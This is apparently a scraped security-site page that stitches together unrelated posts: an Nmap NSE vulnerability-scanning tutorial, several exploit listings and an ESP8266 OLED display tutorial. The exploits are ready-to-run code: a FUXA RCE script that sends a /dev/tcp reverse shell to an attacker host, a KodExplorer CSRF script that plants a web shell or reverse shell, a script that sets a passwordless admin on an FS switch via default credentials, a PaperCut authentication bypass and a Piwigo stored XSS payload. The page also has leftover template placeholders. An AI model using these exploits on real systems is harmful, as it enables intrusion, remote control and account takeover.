openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179 https://nvd.nist.gov/vuln/detail/CVE-2023-27179 https://www.exploit-db.com/papers/12883
HireHackking

Title: Detecting CVE vulnerabilities using Nmap scripts

HACKER · %s · %s

A little-known part of Nmap is NSE, or Nmap Scripting Engine, which is one of the most powerful and flexible features of Nmap. It allows users to write (and share) simple scripts to automate various network tasks. Nmap has a comprehensive collection of NSE scripts built in, which users can easily use, but users can also use NSE to create custom scripts to meet their personalized needs. Here I will show two similar prefabricated NSE scripts, nmap-vulners and vulscan at the same time. These two scripts are designed to enhance version detection of Nmap by generating relevant CVE information for specific services such as SSH, RDP, SMB, etc. CVE or Common Vulnerabilities and Exposures is a method used by security researchers to leverage databases to catalog and reference individual vulnerabilities.
For example, an exploit database is a popular database that publicly discloses vulnerabilities. Exploit-DB uses CVE to compile individual vulnerabilities and vulnerabilities associated with specific versions of services such as "SSH v7.2". Here are screenshots that might be exploited on the Exploit-DB website. Please note the CVE number assigned to this particular SSH vulnerability.
Both nmap-vulners and vulscan use CVE records to enhance Nmap's version detection. Nmap will identify the version information of the scan service. The NSE script will get that information and generate a known CVE that can be used to exploit the service, making it easier to find vulnerabilities.
Below is an example of Nmap version detection without using NSE scripts. Nmap found an SSH service on port 22 using version "OpenSSH 4.3".
nmap -sV -p22 1##.##.###.##.##21
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.58s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
`````
Here is an example of the same server using NSE scripts. We can now see that there is more information output. nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.##.#21
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.54s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:4.3:
| CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
| CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924
| CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
| CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904
| CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109
| CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052
| CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
| CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
| CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
| CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
|_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
| vulscan: scipvuldb.csv:
| [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
| [39331] OpenBSD 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
| [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability
| [43307] OpenBSD 4.0 unknown vulnerability
| [41835] OpenBSD up to 4.8 unknown vulnerability
| [38743] OpenBSD up to 4.6 unknown vulnerability
| [36382] OpenBSD OpenSSH up to 4.6 information disclosure
| [32699] OpenBSD OpenSSH 4.1 denial of service
| [2667] OpenBSD OpenSSH 4.4 Separation Monitor Designfehler
| [2578] OpenBSD OpenSSH up to 4.4 Singal race condition
| [32532] OpenBSD OpenSSH 4.5 packet.c denial of service
| [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler
| [1724] OpenBSD OpenSSH 4.0 GSSAPIDelegateCredentials Designfehler
| [1723] OpenBSD OpenSSH 4.0 Dynamic Port Forwarding Designfehler
| [26219] OpenBSD OpenSSH up to 4.1 pl information disclosure
| [16020] OpenBSD OpenSSH 4.5 Format String
The `nmap-vulners NSE` script reports a dozen CVEs disclosed in the past few years. nmap-vulners CVE is organized by severity, "9.3" is the worst and is at the top of the list, so it is worth studying. The vulscan NSE script (after all CVEs) also reports a dozen interesting vulnerabilities related to OpenSSH v4.3.
Both NSE scripts show useful information about vulnerable services well. Every time we use NSE scripts, Nmap-vulners will query the Vulners exploit database. Vulscan, on the other hand, queries the local database on our computer, which was preconfigured when we first downloaded vulscan.
#Step 1
##Installation: Nmap-Vulners
To install the nmap-vulners script, we first use cd to change to the Nmap script directory. cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the following command in the terminal. This is why nmap-vulners is installed. No configuration is required after installation. git clone https://github.com/vulnersCom/nmap-vulners.git
#Step 2
##Installation: Vulscan
To install vulscan, we also need to clone the GitHub repository into the Nmap script directory. Use the following command to do this. git clone https://github.com/scipag/vulscan.git
As mentioned earlier, vulscan uses a preconfigured database stored locally on our computers. We can view these databases in the root directory of the vulscan directory. Run the following ls command to list the available databases. ls vulscan/*.csv
vulscan/cve.csv
vulscan/exploitdb.csv
vulscan/openvas.csv
vulscan/osvdb.csv
vulscan/scipvuldb.csv
vulscan/securityfocus.csv
vulscan/securitytracker.csv
vulscan/xforce.csv
### Vulscan supports many excellent exploit databases: scipvuldb.csv
cve.csv
osvdb.csv
securityfocus.csv
securitytracker.csv
xforce.csv
exploitdb.csv
openvas.csv
To ensure that the database is completely up-to-date, we can use the updateFiles.sh script in the vulscan/utilities/updater/directory. Switch to the updater directory by typing the following command in the terminal. cd vulscan/utilities/updater/
Then, use the following chmod command to make sure that the file has the appropriate permissions to execute on your computer. chmod +x updateFiles.sh
We can then execute and run the script by typing the following command in our terminal./updateFiles.sh
Once we're done, we can now start using NSE scripts.
#Step 3
##Scan with Nmap-Vulners
Using NSE scripts is simple. All we have to do is add the --script parameter to our Nmap command and tell Nmap which NSE script to use. To use the nmap-vulners script, we will use the following command. Of course, change #after -p to scan port and change the following #s to the IP address you are using. nmap --script nmap-vulners -sV -p### #.### .#### .#####
The -sV is absolutely necessary. Using -sV, we tell Nmap to detect the target address of the version information. If Nmap does not generate version information, nmap-vulners will have no data to query the Vulners database. Always use -sV when using these NSE scripts. nmap --script nmap-vulners -sV -p80 1##.##.###.##.#24
Here is one of the examples in use: nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p22 1##.##.###.##.#43
Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.###.##.#43
Host is up (0.52s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| vulscan: exploitdb.csv:
| [2444] OpenSSH=4.3 pl (Duplicated Block) Remote Denital of Service Exploit
| [21402] OpenSSH s.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [3303] Portable OpenSSH=3.6.1p-PAM/4.1-SUSE Timing Attack Exploit
As VulDB's chief architect, vulscan developers usually spend time updating scipvuldb.csv database files. Querying the database may yield the best results when using the vulscan NSE script.
#Step Five
Merge into one command
As a security scanner, NSE scripts significantly improve Nmap's versatility, scope and resourcefulness. To make full use of Nmap's version scanning, we can use both nmap-vulners and vulscan in one command. To do this, type the following command in the terminal. nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p### #.### .### .#### .####
HireHackking

FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE) # Date: 18/04/2023 # Exploit Author: Rodolfo Mariano # Vendor Homepage: https://github.com/frangoteam/FUXA # Version: FUXA V.1.1.13-1186 (current) from argparse import RawTextHelpFormatter import argparse, sys, threading, requests def main(rhost, rport, lhost, lport): url = "http://"+rhost+":"+rport+"/api/runscript" payload = { "headers": { "normalizedNames":{}, "lazyUpdate": "null" }, "params":{ "script":{ "parameters":[ { "name":"ok", "type":"tagid", "value":"" } ], "mode":"", "id":"", "test":"true", "name":"ok", "outputId":"", "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) } } } response = requests.post(url, json=payload) args = None parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>") parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost') parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881) parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost') parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport') args=parser.parse_args() main(args.rhost, args.rport, args.lhost, args.lport)
HireHackking

Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS) Application: Piwigo Version: 13.6.0 Bugs: Stored XSS Technology: PHP Vendor URL: https://piwigo.org/ Software Link: https://piwigo.org/get-piwigo Date of found: 18.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image) payload: <img%20src=x%20onerror=alert(4)> POST /piwigo/admin.php?page=photo-9 HTTP/1.1 Host: localhost Content-Length: 159 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/piwigo/admin.php?page=photo-9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe Connection: close name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
HireHackking

KodExplorer 4.49 - CSRF to Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload # Date: 21/04/2023 # Exploit Author: MrEmpy # Software Link: https://github.com/kalcaddle/KodExplorer # Version: <= 4.49 # Tested on: Linux # CVE ID: CVE-2022-4944 # References: # * https://vuldb.com/?id.227000 # * https://www.cve.org/CVERecord?id=CVE-2022-4944 # * https://github.com/MrEmpy/CVE-2022-4944 import argparse import http.server import socketserver import os import threading import requests from time import sleep def banner(): print(''' _ _____________ _____ _ ______ _____ _____ | | / / _ | _ \ ___| | | | ___ \/ __ \| ___| | |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/| |__ | \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | | __| | |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\| |___ \_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_| \____/\____/ | | |_| [KODExplorer <= v4.49 Remote Code Executon] [Coded by MrEmpy] ''') def httpd(): port = 8080 httpddir = os.path.join(os.path.dirname(__file__), 'http') os.chdir(httpddir) Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(('', port), Handler) print('[+] HTTP Server started') httpd.serve_forever() def webshell(url, lhost): payload = '<pre><?php system($_GET["cmd"])?></pre>' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') wshell_f = open('http/shell.php', 'w') wshell_f.write(payload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') print(f'[+] After the victim opens the URI, his shell will be hosted at {url}/data/User/admin/home/shell.php?cmd=whoami') def reverseshell(url, lhost): rvpayload = ' https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ' path = '/data/User/admin/home/' targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ') lport = input('[*] Your local port: ') reqpayload = requests.get(rvpayload).text reqpayload = reqpayload.replace('127.0.0.1', lhost) reqpayload = reqpayload.replace('1234', lport) wshell_f = open('http/shell.php', 'w') wshell_f.write(reqpayload) wshell_f.close() print('[*] Opening HTTPd port') th = threading.Thread(target=httpd) th.start() print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http:// {lhost}:8080/shell.php&uuid=&time=') input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n') while True: hitshell = requests.get(f'{url}/data/User/admin/home/shell.php') sleep(1) if not hitshell.status_code == 200: continue else: print('[+] Shell sent and executed!') break def main(url, lhost, mode): banner() if mode == 'webshell': webshell(url, lhost) elif mode == 'reverse': reverseshell(url, lhost) else: print('[-] There is no such mode. Use webshell or reverse') if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='target url', dest='url', required=True) parser.add_argument('-lh','--local-host', action='store', help='local host', dest='lhost', required=True) parser.add_argument('-m','--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True) arguments = parser.parse_args() main(arguments.url, arguments.lhost, arguments.mode)
HireHackking

FS-S3900-24T4S - Privilege Escalation

HACKER · %s · %s

# Exploit Title: FS-S3900-24T4S Privilege Escalation # Date: 29/04/2023 # Exploit Author: Daniele Linguaglossa & Alberto Bruscino # Vendor Homepage: https://www.fs.com/ # Software Link: not available # Version: latest # Tested on: latest # CVE : CVE-2023-30350 import sys import telnetlib def exploit(args): print(args) if len(args) != 1: print(f"Usage: {sys.argv[0]} <ip>") sys.exit(1) else: ip = args[0] try: with telnetlib.Telnet(ip, 23) as tn: try: tn.read_until(b"Username: ") tn.write(b"guest\r\n") tn.read_until(b"Password: ") tn.write(b"guest\r\n") tn.read_until(b">") tn.write(b"enable\r\n") tn.read_until(b"Password: ") tn.write(b"super\r\n") tn.read_until(b"#") tn.write(b"configure terminal\r\n") tn.read_until(b"(config)#") tn.write(b"username admin nopassword\r\n") tn.read_until(b"(config)#") print( "Exploit success, you can now login with username: admin and password: <empty>") tn.close() except KeyboardInterrupt: print("Exploit failed") tn.close() except ConnectionRefusedError: print("Connection refused") if __name__ == "__main__": exploit(sys.argv[1:])
HireHackking

PaperCut NG/MG 22.0.4 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass # Date: 21 April 2023 # Exploit Author: MaanVader # Vendor Homepage: https://www.papercut.com/ # Version: 8.0 or later # Tested on: 22.0.4 # CVE: CVE-2023-27350 import requests from bs4 import BeautifulSoup import re def vuln_version(): ip = input("Enter the ip address: ") url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted" response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') text_div = soup.find('div', class_='text') product_span = text_div.find('span', class_='product') # Search for the first span element containing a version number version_span = None for span in text_div.find_all('span'): version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip()) if version_match: version_span = span break if version_span is None: print('Not Vulnerable') else: version_str = version_span.text.strip() print('Version:', version_str) print("Vulnerable version") print(f"Step 1 visit this url first in your browser: {url}") print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard") if __name__ =="__main__": vuln_version()
HireHackking

Title: ESP8266+0.96oled guide to get into the pit

HACKER · %s · %s

Equipment List
esp8266 development board oled (0.96) DuPont Line
Equipment circuit diagram

Add library
u8g2 library file
Project 1 Hello World
/*
HelloWorld.ino
esp8266+oled project example
Forum: bbskali.cn
Blog: blog.bbskali.cn
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //Here D1 D2 is the corresponding welding pin
void setup(void) {
u8g2.begin();
}
void loop(void) {
u8g2.clearBuffer(); //clear the internal memory
u8g2.setFont(u8g2_font_ncenB08_tr); //choose a suitable font
u8g2.drawStr(0,10,'Hello World!'); //write something to the internal memory
u8g2.sendBuffer(); //transfer internal memory to the display
delay(1000);
}The effect is as follows
The code of
Item 2 Display Chinese characters
is as follows:
/*
esp8266+oled display
Show Chinese character items
Forum address: bbskali.cn
Blog: blog.bbskali.cn
*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display
void setup(void) {
u8g2.begin();
u8g2.enableUTF8Print(); //enable UTF8 support for the Arduino print() function
}
void loop(void) {
u8g2.setFont(u8g2_font_unifont_t_chinese2); //use chinese2 for all the glyphs of 'Hello world'
u8g2.setFontDirection(0);
u8g2.clearBuffer();
u8g2.setCursor(0, 15);
u8g2.print('kali forum');
u8g2.setCursor(0, 30);
u8g2.print('bbskali.cn'); //Chinese 'Hello World'
u8g2.setCursor(0, 45);
u8g2.print('kali Hacker Teaching');
u8g2.sendBuffer();
delay(1000);
}The effects are as follows:

The code of
Item 3 Display multiple lines of text
is as follows:
/*

*/
#include Arduino.h
#include U8g2lib.h
#ifdef U8X8_HAVE_HW_SPI
#include SPI.h
#endif
#ifdef U8X8_HAVE_HW_I2C
#include Wire.h
#endif
U8G2_SSD1306_128X64_NONAME_1_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); //All Boards without Reset of the Display
#define FONT u8g2_font_wqy14_t_gb2312b
//#define FONT u8g2_font_wqy16_t_chinese1
//#define FONT u8g2_font_wqy16_t_gb2312b
//The next two macros define the scroll speed of the short story
#define SCROLL_DELTA 2
#define SCROLL_DELAY 200
const char c_str[]=
'Shen Nong\n\n'
'KALI Forum Introduction\n'
'kali forum was created at 20\n'
'17, Webmaster Priess\n'
'This forum is based on kali'
'Full Research and Cybersecurity\n'
'For the convenience of friends' learning\n'
'We built this forum\n'
'Forum study is completely free\n'
'Our URL :\n'
'bbskali,cn\n'
'WeChat official account:\n'
'【kali Hacker Teaching】\n'
'Thank you for your attention. \n';
char buf[48]; //there are at most 8 chinese glyphs per line, max buf size is 8*3=24

uint8_t total_lines; //the total number of lines in the story
uint8_t i; //loop variable for the lines
uint8_t line_cnt; //number of lines to draw, usually equal to lines_per_draw
uint8_t start_line; //topmost visible line, derived from top_window_pos
uint8_t lines_per_draw; //how many lines to draw on the screen, derived from font and display height
uint16_t glyph_height; //height of the glyphs
uint16_t top_window_pos; //defines the display position in pixel within the text
uint16_t total_height; //total height in pixel, derived from font height and total_lines
u8g2_uint_t top_offset; //offset between the first visible line and the display
void setup(void) {
/* U8g2 Project: SSD1306 Test Board */
pinMode(D2, OUTPUT);
pinMode(D1, OUTPUT);
digitalWrite(10, 0);
digitalWrite(9, 0);
/* U8g2 Project: T6963 Test Board */
//pinMode(18, OUTPUT);
//digitalWrite(18, 1);
/* U8g2 Project: KS0108 Test Board */
//pinMode(16, OUTPUT);
//digitalWrite(16, 0);
/* U8g2 Project: LC7981 Test Board, connect RW to GND */
//pinMode(17, OUTPUT);
//digitalWrite(17, 0);
/* U8g2 Project: Pax Instruments Shield: Enable Backlight */
//pinMode(6, OUTPUT);
//digitalWrite(6, 0);
u8g2.begin();

/* select a font */

//u8g2.setFont(u8g2_font_wqy12_t_chinese1); //two unknown glyphs
//u8g2.setFont(u8g2_font_wqy12_t_chinese3); //two unknown glyphs
//u8g2.setFont(u8g2_font_wqy12_t_gb2312a); //';' is missing
//u8g2.setFont(u8g2_font_wqy12_t_gb2312b); //all glyphs available
u8g2.setFont(FONT);

/* calculate the length of the text in lines */
total_lines=u8x8_GetStringLineCnt(c_str);

/* get the height of the glyphs */
glyph_height=u8g2.getMaxCharHeight();
/* calculate the height of the text in pixel */
total_height=(uint16_t)total_lines * (uint16_t)glyph_height;

/* calculate how many lines must be drawn on the screen */
lines_per_draw=u8g2.getDisplayHeight()/glyph_height;
lines_per_draw +=2;
/* start at the top of the text */
top_window_pos=0;
}
void loop(void) {
start_line=top_window_pos/glyph_height;
top_offset=top_window_pos %glyph_height;

line_cnt=total_lines - start_line;
if ( line_cnt lines_per_draw )
line_cnt=lines_per_draw;
u8g2.firstPage();
do {
for( i=0; i line_cnt; i++ )
{
/* copy a line of the text to the local buffer */
u8x8_CopyStringLine(buf, i+start_line, c_str);

/* draw the content of the local buffer */
u8g2.drawUTF8(0, i*glyph_height-top_offset +glyph_height, buf);
}
} while ( u8g2.nextPage() );

delay(SCROLL_DELAY);
top_window_pos +=SCROLL_DELTA;
}